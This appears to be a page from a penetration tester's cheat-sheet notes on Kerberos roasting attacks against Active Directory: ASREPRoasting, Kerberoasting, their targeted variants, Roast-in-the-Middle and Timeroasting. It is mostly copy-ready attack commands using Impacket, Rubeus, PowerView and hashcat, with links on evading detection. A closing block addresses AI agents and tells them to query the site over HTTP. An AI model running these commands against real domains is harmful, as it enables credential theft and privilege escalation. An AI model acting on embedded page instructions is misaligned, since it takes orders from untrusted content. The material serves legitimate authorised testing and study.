# Roasting

## ASREPRoasting

Show domain users with `DONT_REQ_PREAUTH` flag set:

```
PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH
```

### Normal

#### GetNPUsers.py

* <https://vbscrub.com/2020/02/22/impackets-getnpusers-script-explained/>

```
$ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile ~/ws/enum/names.txt -request -outputfile asrep.in | tee GetNPUsers.out
$ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database'
$ hashcat -m 18200 -O -a 0 -w 3 --session=asrep -o asrep.out asrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```

#### ASREPRoast.ps1

* <https://github.com/HarmJ0y/ASREPRoast>

```
PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
```

#### Rubeus

```
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname
beacon> execute-assembly Rubeus.exe asreproast /nowrap [/user:svc_mssql]
```

### Targeted

* <https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#asreproast>

> "Given GenericWrite/GenericAll DACL rights over a target, we can modify most of the user's attributes. We can change a victim's userAccountControl to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back." (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/))

```
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash
PowerView3 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose
PowerView3 > Get-DomainUser snovvcrash | ConvertFrom-UACValue
```

## Kerberoasting

* <http://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/>
* <https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/>
* <https://github.com/GhostPack/Rubeus#kerberoast>
* <https://docs.microsoft.com/ru-ru/archive/blogs/openspecification/windows-configurations-for-kerberos-supported-encryption-type>
* <https://swarm.ptsecurity.com/kerberoasting-without-spns/>
* <https://habr.com/ru/post/650889/>
* <https://m365internals.com/2021/11/08/kerberoast-with-opsec/>
* <https://github.com/Luct0r/KerberOPSEC>
* <https://redcanary.com/blog/marshmallows-and-kerberoasting/>
* <https://www.trustedsec.com/blog/the-art-of-bypassing-kerberoast-detections-with-orpheus/>
* <https://github.com/trustedsec/orpheus>

{% embed url="<https://twitter.com/_wald0/status/1361720293539139589>" %}

Check `msDS-SupportedEncryptionTypes` attribute (if RC4 is enabled):

```
PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
```

### Normal

#### GetUserSPNs.py

```
$ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 -request -outputfile tgsrep.in
$ hashcat -m 13100 -O -a 0 -w 3 --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```

{% hint style="info" %}
In case LDAP(S) ports are blocked, kerberoasting can be performed via the Global Catalog port (3268/TCP). For that purposes [change](https://github.com/fortra/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/GetUserSPNs.py#L268) `ldap://` scheme to `gc://`.
{% endhint %}

Check if there're any **brutable** kerberoastable users with [a path to high value targets](https://github.com/ShutdownRepo/Exegol-images/blob/dcc67cbb8ec69e3dd80aa0f2d8f78980730d3dca/sources/bloodhound/customqueries.json#L34) having got cracked NTDS (useful when writing a report):

```
$ cat ~/ws/enum/tgsrep.in | grep -Pho 'krb5tgs\$23\$.*?\$' | cut -d'*' -f2 | cut -d'$' -f1 > t

$ for acc in `cat t`; do grep -ai $acc ~/ws/loot/ntds.cracked | cut -d: -f1 >> t2; done && rm t

$ vi t2
...convert domain prefix to domain suffix (megacorp.local\svcsql -> svcsql@megacorp.local)...

$ python3 max.py -u neo4j -p 'WeaponizeK4li!' mark-owned -f t2 --add-note "kerberoasted" && rm t2

$ python3 max.py -u neo4j -p 'WeaponizeK4li!' query -q 'MATCH p=shortestPath((n {owned:true})-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..5]->(m {highvalue:true})) WHERE NOT n=m RETURN p' --path
```

#### PowerView

* [https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#L2777)

```
PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl
```

#### Rubeus

* <https://github.com/GhostPack/Rubeus>

```
beacon> execute-assembly ADSearch.exe --search "(&(sAMAccountType=805306368)(servicePrincipalName=*))"
beacon> execute-assembly Rubeus.exe kerberoast /format:hashcat /nowrap [/usetgtdeleg] [/user:svc_mssql]
```

### Targeted

> "We can execute 'normal' Kerberoasting instead: given modification rights on a target, we can change the user's serviceprincipalname to any SPN we want (even something fake), Kerberoast the service ticket, and then repair the serviceprincipalname value." (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/))

```
PowerView3 > Get-DomainUser snovvcrash | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
PowerView3 > $User = Get-DomainUser snovvcrash 
PowerView3 > $User | Get-DomainSPNTicket | fl
PowerView3 > $User | select serviceprincipalname
PowerView3 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname
```

### Roast-in-the-Middle

* <https://www.semperis.com/blog/new-attack-paths-as-requested-sts/>
* <https://github.com/Tw1sm/RITM>

```
$ sudo ritm -t/--target 192.168.1.123 -g/--gateway 192.168.1.1 -d/--dc-ip 192.168.1.11 -u/--users-file users.txt
```

### Downgrading Encryption Type (RC4)

* <https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1>
* <https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled>
* <https://vbscrub.com/tag/kerberos/>

## Timeroasting

* [\[PDF\] Timeroasting, Trustroasting and Computer Spraying (Secura)](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
* <https://github.com/SecuraBV/Timeroast>

```
$ python3 timeroast.py -a 50 -t 120 -o sntp.in 192.168.1.11
$ hashcat -m31300 -O -a0 -w3 --session=sntp -o sntp.out sntp.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
$ hashcat -m10 -O -a0 -w3 --session=sntp -o sntp.out sntp.in nthashes.txt --hex-wordlist --hex-salt
```

### Targeted

* <https://medium.com/@offsecdeer/targeted-timeroasting-stealing-user-hashes-with-ntp-b75c1f71b9ac>
* <https://github.com/OffsecDeer/TargetedTimeroast>
* <https://github.com/PShlyundin/TimeSync>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos/roasting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.